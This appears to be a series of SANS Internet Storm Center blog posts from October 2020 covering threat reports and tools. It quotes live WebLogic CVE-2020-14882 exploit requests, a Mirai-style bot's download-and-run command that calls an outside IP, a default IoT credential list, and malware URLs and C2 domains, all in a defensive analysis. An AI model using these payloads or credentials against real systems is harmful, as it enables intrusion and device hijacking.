ISC Stormcast For Friday, October 30th 2020 https://isc.sans.edu/podcastdetail.html?id=7232, (Fri, Oct 30th)
[This post is based on late-breaking news we are still investigating. Please send us any corrections you may have. We are in the process of validating and hopefully understanding all the details ourselves. Check back for updates]
Just about a week ago, as part of a massive quarterly "Critical Patch Update" (aka "CPU"), Oracle patched CVE-2020-14882 in WebLogic. Oracle at the time assigned it a CVSS score of 9.8. We are now seeing active exploitation of the vulnerability against our honeypot after PoC exploits had been published.
Vulnerable WebLogic Versions:
10.3.6.0.0, 126.96.36.199.0, 188.8.131.52.0, 184.108.40.206.0 and 220.127.116.11.0
The exploitation of the vulnerability is trivial. For example, we are seeing these exploits being currently used:
[the honeypot's IP has been replaced with AAA.BBB.CCC.DDD. Spaces added to allow for line breaks ]
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle= com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec(%27cmd /c
GET /console/images/%252e%252e%252fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession( \"java.lang.Runtime.getRuntime().exec( 'nslookup%20AAA.BBB.CCC.DDD.0efp3gmy20ijk3tx20mqollbd2jtfh4.burpcollaborator.net')
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession( %22java.lang.Runtime.getRuntime().exec( %27ping%20AAA.BBB.CCC.DDD.uajiak.dnslog.cn%27);%22);
These exploit attempts are right now just verifying if the system is vulnerable. Our honeypots (up to now) do not return the "correct" response, and we have not seen follow-up requests yet.
Currently, exploit attempts originate from these 4 IP addresses:
First IP seen. Around noon UTC Oct 18th.
attempting to ping [some id].dnslog.cn
Address assigned to China Unicom
attempting to ping [victim ip].uajiak.dnslog.cn
Address assigned to Linode (USA)
At this point, most prolific scanner. attempting to execute "cmd /c" ?
The address is assigned to MivoCloud (Moldovia)
pinging [some ID].burpcollaborator.net
Address assigned to Datacamp Ltd (HongKong)
I am in the process of notifying the ISPs.
ISC Stormcast For Thursday, October 29th 2020 https://isc.sans.edu/podcastdetail.html?id=7230, (Thu, Oct 29th)
You probably remember that back in March, Microsoft released a patch for a vulnerability in SMBv3 dubbed SMBGhost (CVE-2020-0796), since at that time, it received as much media attention as was reasonable for a critical (CVSS 10.0) vulnerability in Windows, which might lead to remote code execution.
Luckily, achieving RCE through SMBGhost turned out to be anything but simple so although the first public exploits appeared fairly quickly, they used the vulnerability “only” for local privilege escalation. It wasn’t until June that a PoC for achieving RCE was published. Since release of this PoC was again met with wide attention from the media, one might reasonably expect that by now, most of the vulnerable machines would have been patched – especially those accessible from the internet.
Going by data I’ve gathered from Shodan over the last eight months, this doesn’t appear to be true, however.
Besides scanning for open ports and running services, Shodan is also capable of identifying machines/IPs which are impacted by specific vulnerabilities – you may try this yourself if you have one of the higher-level account by using the search filter vuln (e.g. “vuln:cve-2020-0796”). I’m unsure what method Shodan uses to determine whether a certain machine is vulnerable to SMBGhost, but if its detection mechanism is accurate, it would appear that there are still over 103 000 affected machines accessible from the internet. This would mean that a vulnerable machine hides behind approximately 8% of all IPs, which have port 445 open.
The following chart shows countries with most detections – I've included those with at least 2 000 IPs detected as vulnerable by Shodan.
It is hard to say why are so many unpatched machines are still out there. Microsoft did release the patch for CVE-2020-0796 out-of-band instead as a part of its usual patch Tuesday pack of fixes, but that was the only unusual thing about it and doesn’t make much sense that this would be the reason why it still isn't applied on so many systems… In any case, if the numbers provided by Shodan are accurate, they are concerning to say the least, especially since SMBGhost – as an RCE – is “wormable”. If for whatever reason you still haven't patched any of your systems, now would seem to be a good time to do so.
Hopefully, we won’t see any worms or other attempts at mass exploitation of CVE-2020-0796 any time soon, but who knows – it would perhaps be timely given the name of the vulnerability and the upcoming Halloween…
ISC Stormcast For Wednesday, October 28th 2020 https://isc.sans.edu/podcastdetail.html?id=7228, (Wed, Oct 28th)
ISC Stormcast For Tuesday, October 27th 2020 https://isc.sans.edu/podcastdetail.html?id=7226, (Tue, Oct 27th)
Excel 4 macros are composed of formulas (commands) and values stored inside a sheet.
Each sheet in a spreadsheet can be "visible", "hidden" or "very hidden". Malware authors will often make Excel 4 macro sheets hidden or very hidden.
In .xls files, spreadsheet data is stored in the Workbook stream as BIFF records. There is a BIFF record for sheets: the BOUNDSHEET record. The byte value at position 5 in a BOUNDSHEET record defines the visibility of a sheet: visible (0x00), hidden (0x01) or very hidden (0x02):
Encoding the visibility of a sheet is done with the 2 least significant bits. Per Microsoft's documentation, the 6 more significant bits are unused bits and must be ignored. In spreadsheets created with Excel, these bits are set to 0.
From time to time, I find malicious Excel 4 macro documents, where these bits are not zero:
oledump's plugin_biff will report this: "reserved bits not zero".
The "visibility" value is 0x0A, that's 0x08 + 0x02: thus the sheet is very hidden (0x02).
Excel has no problem at all opening a spreadsheet like this (the unused bits must be ignored). But if you use or develop detection rules like YARA, Suricata, ... ; be aware that these unused bits can be set to 1 in stead of 0.
You might wonder: 2 bits to encode visibility. Visible (0x00), hidden (0x01) or very hidden (0x02).
What about 0x03?
When a sheet's visibility is set to 0x03 (I do this by patching the .xls with a binary editor), my tests with Excel 2016 and 2019 show that an Excel 4 macro sheet will behave as "very hidden", and the macro code will be executed.
However, before a user is prompted to enable macros, that user will have to click through extra warnings:
ISC Stormcast For Monday, October 26th 2020 https://isc.sans.edu/podcastdetail.html?id=7224, (Mon, Oct 26th)
Programs written in the Object Pascal (Delphi) programming language, have their strings stored in the executable file as Pascal strings. A Pascal string (or P-string) is a string that is internally stored with a length-prefix: an integer that counts the number of characters inside the string.
When analyzing Delphi malware, it is useful to extract its Pascal strings (in stead of extracting all strings). You can do this now with an update to my strings.py tool.
I've also recorded a video showing this new feature:
I have well over 2 years of honeypot logs and only started seeing CensysInspect user-agent in my logs about 2 months ago. Most of us are familiar with Shodan and often use it to find what is or was exposed to the Internet. This is an alternative site to search the same data with 3 available search options, by IPv4, websites and certificates.
This is an example of what can be seen in webserver logs:
20201024-071114: 192.168.25.9:80-18.104.22.168:54072 data 'GET / HTTP/1.1\r\nHost: 70.50.xx.xx\r\nUser-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n'
This scanner works by grabbing banner and collecting all information being leaked by insecure devices which get categorized and stored for "research" purposes. According to their FAQ, it uses Zmap which "[...] can scan the entire public IPv4 address space in under 45 minutes." and uses "ZGrab can perform a TLS connection and collect the root HTTP page of all hosts ZMap finds on TCP/443." The information captured is like what Shodan provides:
This is an alternative to find Internet-facing systems, finding open ports and services that listen on a port. Censys probes for more than just the standard known ports. This is some of the ports starting with the top (total in 2 months > 1000 ports).
IP Ranges included in the probes:
Russian State-Sponsored APT Actor Compromises U.S. Gov Targets https://us-cert.cisa.gov/ncas/alerts/aa20-296a, (Fri, Oct 23rd)
Sooty was developed with the intent of helping SOC analysts automate parts of their work flow. Sooty serves to perform the more mundane and routine checks SOC analysts typically undertake with the hope of freeing the analyst to conduct deeper analysis in a more efficient and timely manner.
Download or clone Sooty from its GitHub repository.
I cloned Sooty into my tools directory with git clone https://github.com/TheresAFewConors/Sooty.git. You’ll need a current implementation of Python 3.x, and be sure to pull in Sooty’s requirements with pip install -r requirements.txt, I was missing a number of them. You’ll also need drop your API keys into their assigned slots in example_config.yaml and rename it config.yaml. The GitHub repo Requirements and Installation section has links for each of the services you’ll want API keys for, and a few pointers for setting them up properly.
Thereafter, python Sooty.py will get you started. Figure 1 represents the menu you’ll be presented with.
Figure 1: Sooty menu
I’ve had the recent pleasure of hunting duties and Sooty went to immediate use for preliminary assessment purposes. An instant IP reputation result is seen in Figure 2.
Figure 2: Sooty IP reputation
Suffice it to say, don’t count that IP on the good guy list.
Figure 3 exhibits a check of one of my email addresses.
Figure 3: Sooty email reputation
The email reputation check includes Have I Been Pwned results, you can see the answer to that question is affirmative.
Sooty option 7 will run URLs through urlscan.io as seen in Figure 4.
Figure 4: Sooty urlscan
The decoders, DNS, and phishing checks are handy for…you know…decoding, DNS, and phishing checks as follows.
Decoders: ProofPoint, URLs, Office SafeLinks, URL unShortener, Base64, and Cisco Password 7.
DNS: Reverse DNS, DNS, and WHOIS lookups
Phishing: Analyze Email, Email Addresses for Known Activity, Generate an Email Template based on Analysis, Analyze an URL with Phishtank, and HaveIBeenPwned
I’m also fond of the hashing functions, particularly Option 3: Check a hash for known malicious activity. As seen in Figure 5, Sooty calls the VirusTotal API, and results are returned very quickly.
Figure 5: Sooty hash check
This is an incredibly handy, convenient tool, it really does deliver as promised, I can vouch for it during real operations, not just toolsmith lab time. I do hope support continues for it. Give it a go and enjoy!
Cheers…until next time.
ISC Stormcast For Friday, October 23rd 2020 https://isc.sans.edu/podcastdetail.html?id=7222, (Fri, Oct 23rd)
BazarLoader phishing lures: plan a Halloween party, get a bonus and be fired in the same afternoon, (Thu, Oct 22nd)
Phishing messages distributing BazarLoader have come to be commonplace in the past six months, but in the last couple of weeks I’ve been seeing more and more e-mails spreading this malware caught in my quarantine. Although contents of these messages differ, their appearance is usually similar – they all contain a fairly long link to Google Docs along with a text part instructing the recipient to visit the included URL. The lures can range quite widely and the uncoordinated way, in which the messages are distributed, can result in a single recipient receiving fairly amusing combinations of messages. Given the current global not-so-optimistic situation, I thought I’d try to share something a little bit “lighter” today and take a look at some of these messages, but before we get to that, let’s take a short look at the URLs distributed in the e-mails.
Should a recipient click on the Google Docs link, they would be directed to a web page containing a fake preview of a document corresponding to the lure mentioned in the e-mail. The page would also contain download links, from which a victim might seemingly download the promised document. The downloaded file would however insted be a BazarLoader binary.
It is worth mentioning that in the latest campaign I’ve seen (the case of “Halloween survey” shown above), the threat actors appeared to use a Slack to host the final payload using the following URL.hxxps[:]//files-origin[.]slack[.]com/files-pri/T012C3R8D0U-F01D639HZJQ/download/report-review20-10[.]exe?pub_secret=e33269e24f
The link was no longer working when I tried it, but from what I’ve read about Bazar, use of Slack would seem to be a new way of distributing its malicious executables. But back to the phishing e-mails themselves...
As we’ve mentioned, the messages are visually very similar, but the lures differ significantly. And since distribution of these e-mails seems to be completely uncoordinated, reading through those, which one might receive in single a week or two, might make one wonder whether the threat actors aren’t subtly trying to make us embrace the old U.S. Army motto of “Be All You Can Be”.
The reason at least I get this feeling is, that going only by the messages addressed to me personally in the last few weeks:
- I have been probably the most complained-about employee in the company (and I have received several substantial pay cuts because of that)
- I was fired (probably due to me ignoring all the customer complaint reviews)
- I have been complained about a number of additional times (I guess they changed their minds on the "termination issue"?)
- I was awarded a bonus for being such a good employee (I guess our financial department didn’t hear about me not doing so well with customers…)
- I was asked to read a company report (hopefully not one mentioning me by name and heavily discussing how to avoid customer complaints)
- I was asked to participate in a company survey on improving working conditions (I guess they decided bad working conditions were the main reason for me not being too good with customers...)
- And finally, this Tuesday I was asked to tell the company how we should celebrate Halloween this year (I guess they have taken my thoughts on how to improve the working conditions to heart?)
Reading through all of these e-mails (and many more), one can’t help but wonder whether sending out similarly looking messages to the same addresses over and over again is really effective for the attackers... Unless their aim is to make the more impressionable recipients feel a bit unsure about the dependability of their memory when it comes to their interactions with customers.
Although I don’t mean to make light of phishing, as it is an undeniable threat, it is good to sometimes take a look at it’s more amusing side. My experience is that this is especially true when it comes to security awareness courses as humor tends to make any examples "stick" a bit more. And since October is a Cybersecurity Awareness Month[1,2], if you haven’t yet shared any tips about how to stay a bit safer online with your less technically-oriented colleagues, maybe showing them the contradictory tone of some of the phishing lures above might not be a bad start...
ISC Stormcast For Thursday, October 22nd 2020 https://isc.sans.edu/podcastdetail.html?id=7220, (Thu, Oct 22nd)
20 new Cisco security advisories for ASA and Firepower with CVSS>7: https://tools.cisco.com/security/center/publicationListing.x, (Wed, Oct 21st)
ISC Stormcast For Wednesday, October 21st 2020 https://isc.sans.edu/podcastdetail.html?id=7218, (Wed, Oct 21st)
For the past several months, I've been tracking a campaign that sends rather odd-looking emails like this
The sender (from) address on these emails is usually impersonating an existing shipping or logistics company. The ships mentioned in the emails actually exist, and according to marinetraffic.com, the vessels are in fact traveling in the area and with cargo that makes the content of such harbor berthing reservation and cargo manifest emails seem plausible.
Between two to five emails of this style arrive in one of my spam traps every weekday. The scammers don't work on the weekends, and sometimes, they take a full week off. But they inevitably come back, and try again. Most emails are received between 2am and 4am UTC, which - assuming the mails are sent during the local morning - could suggest that the sender is sitting somewhere between Bangkok and Shanghai. The sending email servers are everywhere, but show some clustering in Malaysia.
The emails themselves display a casual familiarity with marine jargon, tonnages, draft, cargo types, DWT, routing, ETAs and marine radio procedures. They would be mildly entertaining to read, before getting filed in the spam folder ... if it weren't for the attachment.
Sized between 500k and 1.5m, the attachment type of choice by the bad guys for the past several months has been a ".cab". Virustotal detection for the samples varies, and ranges from "none" at time of receipt, to 50+ engines a couple days later.
Two recent samples from this campaign
The malware in question happens to be Agent Tesla spyware. Since April, my sandbox collected several hundred distinct Agent Tesla samples from this actor. Agent Tesla exfiltrates stolen data via HTTPS, and more commonly, over email (SMTPS, tcp/587). While the former (HTTPS) destinations tend to be rather random, the latter (email) destinations are often hosted on email domains that also belong to shipping companies. This indicates to me that the campaign is likely successful to some extent, and over the months in fact has managed to steal valid email credentials (and probably more than that) from firms in the shipping and logistics sector.
Indicators for the emails:
- look for emails with *.cab attachment, with the email subject in all-uppercase
- look for outbound attempts to tcp/587 destined for email servers other than your own
Current tcp/587 C&C domains used are mail.trinityealtd[.]com and smtp.hyshippingcn[.]com, but these destinations are changing daily.
The campaign has a lot of commonalities with what BitDefender reported in April for the Oil&Gas industry https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/.
If you have additional information on this campaign, please let us know, or share in the comments below.(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Last week, I found an interesting Python script that behaves like a Mirai bot. It scans for vulnerable devices exposing their telnet (TCP/23) interface in the wild, then tries to connect using a dictionary of credentials. The script has been uploaded to VT and has a low score of 2/59. Indeed, it does not contain suspicious strings nor API calls. Just a simple but powerful scanner.
Here are the commands injected when a device is found with vulnerable credentials:rekdevice = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://22.214.171.124/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 126.96.36.199 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 188.8.131.52; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 184.108.40.206 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh" #command to send
The IP address %%ip:220.127.116.11%% is offline at the moment but has already a bad reputation and is present in multiple blocklists.
Here is the list of credential pairs tested:combo = [ "root:root", "root:", "admin:admin", "telnet:telnet", "support:support", "user:user", "admin:", "admin:password", "root:vizxv", "root:admin", "root:xc3511", "root:888888", "root:xmhdipc", "root:default", "root:juantech", "root:123456", "root:54321", "root:12345", "root:pass", "ubnt:ubnt", "root:klv1234", "root:Zte521", "root:hi3518", "root:jvbzd", "root:anko", "root:zlxx.", "root:7ujMko0vizxv", "root:7ujMko0admin", "root:system", "root:ikwb", "root:dreambox", "root:user", "root:realtek", "root:00000000", "admin:1111111", "admin:1234", "admin:12345", "admin:54321", "admin:123456", "admin:7ujMko0admin", "admin:1234", "admin:pass", "admin:meinsm", "admin:admin1234", "root:1111", "admin:smcadmin", "admin:1111", "root:666666", "root:password", "root:1234", "root:klv123", "Administrator:admin", "service:service", "supervisor:supervisor", "guest:guest", "guest:12345", "guest:12345", "admin1:password", "administrator:1234", "666666:666666", "888888:888888", "tech:tech", "mother:fucker" ]
The script is pretty well written and is multi-threaded to speed up the scan:for l in xrange(threads): try: t = threading.Thread(target=worker) t.start() except: pass
The script does not implement a random IP address generator, it just uses the zmap scanner:zmap -p23 -N 10000 -f saddr -q --verbosity=0
This command will return 10000 IP addresses that expose a telnet port.
The question that arises when you find this kind of script is: "Can we really find so many devices exposing a telnet interface into the wild in 2020?". I did my own test and launched the above zmap command. In a few seconds, 10K IP addresses were returned. Then, I used the nmap scanner with the 'banner' script to grab telnet banners:nmap -sC --script=banner -p 23 -Pn -iL open-telnet.txt -oA telnet-banners -v -n
I found a lot of banners that disclose the type of devices (routers, WiFi access points, switches, VoIP gateways, IoT, ...). More interesting, a found some devices still bricked by the BrickerBot:# telnet x.x.x.x Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. Internet Chemotherapy Part 11 - BrickerBot (TM) Source Drop (7/31 2020): hxxp://depastedihrn3jtw[.]onion/show.php?md5=20735856837081a18e6f0edf2c1e8d76 Internet Chemotherapy Part 12 - Third Time is the Charm? (9/6 2020) hxxp://depastedihrn3jtw[.]onion/show.php?md5=4c17df6b30ed2704082465d9a1c4ea86 DeepPaste is temperamental (unreachable 75% of time) so if the links are not loading then try again later. Update 10/3: So I have been looking into reconditioning Tenda/Intelbras, Genexis and Zte routers.. Still WIP but seen some positive impact over the last few days/weeks. Update 10/6: ..and Totolink.. 10/9: some new tricks for netis, TVT and Tata Consulting.. what next? Update 10/17: Getting in the Zhone.. seeing real IoT action in 2020 at last (none) login:
I found plenty of notifications and disclaimers warning you that connecting to the device is prohibited, your IP will be logged, etc. Please, don't waste your time to implement such unuseful banners, just get rid of telnet!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant